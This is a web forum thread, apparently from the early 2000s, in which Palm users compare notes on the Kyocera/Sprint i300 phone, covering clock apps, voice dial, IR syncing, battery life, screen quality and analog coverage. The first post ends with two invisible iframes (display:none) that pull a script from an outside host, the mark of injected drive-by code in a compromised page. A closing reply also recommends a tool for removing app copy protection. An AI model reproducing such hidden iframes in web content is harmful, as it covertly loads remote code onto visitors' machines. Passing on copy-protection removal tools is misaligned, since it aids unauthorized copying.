+ Reply to Thread

Cool Comments after Four Days

So I've been checking the i300 out since it hit the streets and finally picked one up at my local Best Buy ($449). I have 14 days to return, but so far so good. I am ticked at Sprint as I am a loyal customer and couldn't get the discounts that new users can. I also got the Best Buy protections package ($39.99) which covers everything for two years.

I'm a long time Palm user and got tired of lugging around two things and their associated chargers, etc. I don't do a ton of calling on a daily basis - I'm more of a "Palm user that also uses a phone". Here's my comments on some specific things:

Clock:
    I really miss the "Clock" app that came with my old m500. I know you can do about the same thing in DataBook, but Clock was pure, simple and reliable. The snooze feature on the scroll key saved me from actually have to look at the Palm when it went off. I have yet to find something like this for the i300. Big Clock sounds like trouble, Clock+ seems like overkill. I really like Digital Clock from PatioSoftware, it splits the screen in two when it goes off - top is off, bottom is snooze. Alas, when you hit snooze it brings up the contrast slider. I've contacted the developer about this.

Voice Dial:
    I am still playing with this feature. Since I have a handfull of people I make most of my calls to, this seems like the ticket without paying for the Sprint voice command service. I have a deep voice and seem to have trouble recording names on the i300 without "sharp" sounds, for example "home" will not record. I have also noticed that it seems to need to hear two words (like in a name) regardless. Anybody else figured out the nuances?

IR Sync:
    I was dreading buying multiple cradles for work and home, but between the latest Win 2K patches and the latest HotSync Manager, I now have the IR port working on my Dell laptop. This had been a known issue with Dells. The IR sync works great, although my initial observations are that it uses alot of battery juice.

Battery Life:
    I'm pretty pleased so far. As I mentioned I do not do a large amount of calling, but I do quite a bit of PDA stuff. I was in the habit of leaving my old phone in the charger every night, and the i300 has been giving me a full day per charge per battery with room to spare, so it fits my routine. Getting the extra battery is sweet.

Screen:
    I get banding and the wavy look on the right edge. It's OK, but I'm tempted to return it and see if I can get another one with a better screen. I do love the grainy texture for writing, and it seems very low smudge. I'm not planning on using any protectors since the screen is covered under the Best Buy protection package. Now that I have color, I love having pictures of my family on the unit. I am using PhotoSuite (came with my old m500).

Coverage:
    I actually am getting better coverage that I did with my old Qualcomm 6035. I get a weak signal in areas I could not get any signal before, however when I make a call in a weak area, it's very choppy. One of the big reasons I didn't wait for the Treo is the i300's ability to do analog. I live in Colorado and spend alot of time in the mountains, so analog is a must.

Thanks to all for contributing to this thread, it really has helped me get comfortable with my new toy.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Comments after Four Days

Originally posted by scottw
    I am ticked at Sprint as I am a loyal customer and couldn't get the discounts that new users can.

Clock:
    I really miss the "Clock" app that came with my old m500. I know you can do about the same thing in DataBook, but Clock was pure, simple and reliable. The snooze feature on the scroll key saved me from actually have to look at the Palm when it went off. I have yet to find something like this for the i300. Big Clock sounds like trouble, Clock+ seems like overkill. I really like Digital Clock from PatioSoftware, it splits the screen in two when it goes off - top is off, bottom is snooze. Alas, when you hit snooze it brings up the contrast slider. I've contacted the developer about this.

IR Sync:
    I was dreading buying multiple cradles for work and home, but between the latest Win 2K patches and the latest HotSync Manager, I now have the IR port working on my Dell laptop. This had been a known issue with Dells. The IR sync works great, although my initial observations are that it uses alot of battery juice.

Battery Life:
    I'm pretty pleased so far. As I mentioned I do not do a large amount of calling, but I do quite a bit of PDA stuff. I was in the habit of leaving my old phone in the charger every night, and the i300 has been giving me a full day per charge per battery with room to spare, so it fits my routine. Getting the extra battery is sweet.

Coverage:
    I actually am getting better coverage that I did with my old Qualcomm 6035. I get a weak signal in areas I could not get any signal before, however when I make a call in a weak area, it's very choppy. One of the big reasons I didn't wait for the Treo is the i300's ability to do analog. I live in Colorado and spend alot of time in the mountains, so analog is a must.

You are correct about Sprint, seems like they do screw their "loyal" customers, but I guess ALL cell companies act this way. When I left both Cingular (the BellSouth Mobility), and ATT), they both offered me great stuff to get me to stay.... where where they when I was a loyal customer of theirs.

Can you "beam" the clock app from your m500 to your i300.

The IR sync is great. I am in the market for a new laptop and have had about 7 Winbooks. Most of the new Winbook models do not have an IR port. This is a MUST for me as I never put my phone in the cradle. I charge my batteries off line at home.

I agree, coverage is better also. I also had the Kyo 6035, but this performs much better. In my house I have trouble with Sprint (and all other carriers), my 6035 and Timeport only work if I sat still. I can use the i300 from anywhere in my house. While I think the 6035 is a better phone, this one point alone will cause my 6035 to sit with all the other old cell phones and gather dust.
    Carl

The clock app on the the m500 is locked, can't beam it. I don't know if this is due to it only working on certain hardware or what. It also doesn't copy it when syncing. Does anyone know of a way to beam a locked app?

I am pretty sure you can not beam a locked app. I think that means it is in the ROM of the Palm. Come to think of it, you can not delete stuff that is locked also.
    Carl

Ir on new laptops

At Comdex this year, I saw a tiny little USB IrDA adapter that you could purchase. It was from an offshore manufacturer, and didn't look like it would cost anything more than $25 ... try searching around on a few sites on "USB" and "IrDA" and see if you come up with anything. That might be the solution to your problem.

I use a single-spindle micro-notepook (Sony VAIO picturebook), so I have no ports whatsoever other than USB, PCMCIA, and FireWire. But through USB, I am able to duplicate most everything I would need.

-Doug

Doug:
    I guess that would work, however, the goal for me is to not have to dig thru my bag and hook up a cable. I guess I am just lazy. I want to be able to aim and fire when ready. I had a serial cable for my '35 and I hated digging it out of the bag to sync. After I got IR to work, I never got that cable out again. I like Winbook's products. I wonder if it cost or real estate that would preclude them from including an IR port?
    Carl
    Carl

What win2k patches

I can't find the win2k patch to do this.....
    Light a man a fire, keep him warm a day.
    Light a man on fire, keep him warm the rest of his life.

Oooh thats nice... Thanks... NT

NT is No text.
    Light a man a fire, keep him warm a day.
    Light a man on fire, keep him warm the rest of his life.

I have an app called BeamCrack which can remove the protected bit on some applications. This allows you to beam them to others.
    -paul